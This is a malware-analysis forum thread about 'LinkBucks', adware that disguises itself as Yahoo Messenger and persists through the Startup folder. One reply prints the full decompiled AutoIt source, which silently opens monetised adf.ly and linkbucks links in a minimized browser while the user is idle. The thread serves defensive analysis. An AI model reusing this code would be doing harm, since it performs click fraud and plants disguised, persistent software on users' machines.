A forum for reverse engineering, OS internals and malware analysis 

LinkBucks

Forum for analysis and discussion about malware.

LinkBucks

 #17017  by TwinHeadedEagle
 Tue Dec 04, 2012 2:48 pm
LinkBucks.com - Get your share!

Discovered yesterday, malware very hard to notice :)

Instert itself in this locations

C:\Program Files\Yahoo Messenger.exe
C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Yahoo Messenger!.lnk


https://www.virustotal.com/file/853a6c9 ... 354578666/
http://r.virscan.org/report/641a1199ce6 ... 45220.html
http://virusscan.jotti.org/en/scanresul ... 5fb9e0d039


MBAM and ESET added it to their definitions, and it's now easy to clean :)
Password: virus
(340.88 KiB) Downloaded 60 times

Re: LinkBucks

 #17028  by EP_X0FF
 Wed Dec 05, 2012 4:53 am
Code: Select all
$test = 0
#NoTrayIcon
#Region
#AutoIt3Wrapper_Icon=ym.ico
#EndRegion
$web = "hxxp://adf.ly/2JiIW "
$web2 = "hxxp://31c3f4bd.linkbucks.com"
If $test = 1 Then
	GUICreate("", 100, 100)
	$lx = GUICtrlCreateLabel(" x ", 15, 5)
	$lt = GUICtrlCreateLabel(" t ", 15, 20)
	GUISetState()
EndIf
If $test = 1 Then
	$t = 10
Else
	$f = 120
	$t = $f
	Sleep(120000)
EndIf
Do
	Sleep(1000)
	$p = Ping("google.com", 10000)
Until $p > 0
website($web)
Sleep(5000)
While 1
	$m = MouseGetPos()
	Sleep(5000)
	If $m[0] = MouseGetPos(0) Then
		For $x = 1 To $t
			Sleep(1000)
			label()
			If NOT ($m[0] = MouseGetPos(0)) Then
				$t = $f
				ExitLoop 
			EndIf
		Next
		label()
		If ($x - 1) = $t Then
			$t = 1200
			website($web2)
		EndIf
	EndIf
WEnd

Func label()
	If $test = 1 Then
		GUICtrlSetData($lx, $x)
		GUICtrlSetData($lt, $t)
	EndIf
EndFunc

Func website($web)
	If NOT (StringInStr($web, "http://") OR StringInStr($web, "https://")) Then $web = "http://" & $web
	If FileExists(@ProgramFilesDir & "\Google\Chrome\Application\chrome.exe") Then
		Run(@ProgramFilesDir & "\Google\Chrome\Application\chrome.exe " & $web, "", @SW_MINIMIZE)
	ElseIf FileExists(@ProgramFilesDir & "\Mozilla Firefox\firefox.exe") Then
		Run(@ProgramFilesDir & "\Mozilla Firefox\firefox.exe " & $web, "", @SW_MINIMIZE)
	Else
		Run(@ProgramFilesDir & "\internet explorer\iexplore.exe " & $web, "", @SW_MINIMIZE)
	EndIf
EndFunc

Re: LinkBucks

 #17042  by thisisu
 Wed Dec 05, 2012 11:31 pm
Comment from VT page:
Opens LinkBucks links every two minutes if mouse doesn't move
Should be this part in the code linked above:
Code: Select all
   $f = 120
   $t = $f
   Sleep(120000)
 Return to “Malware”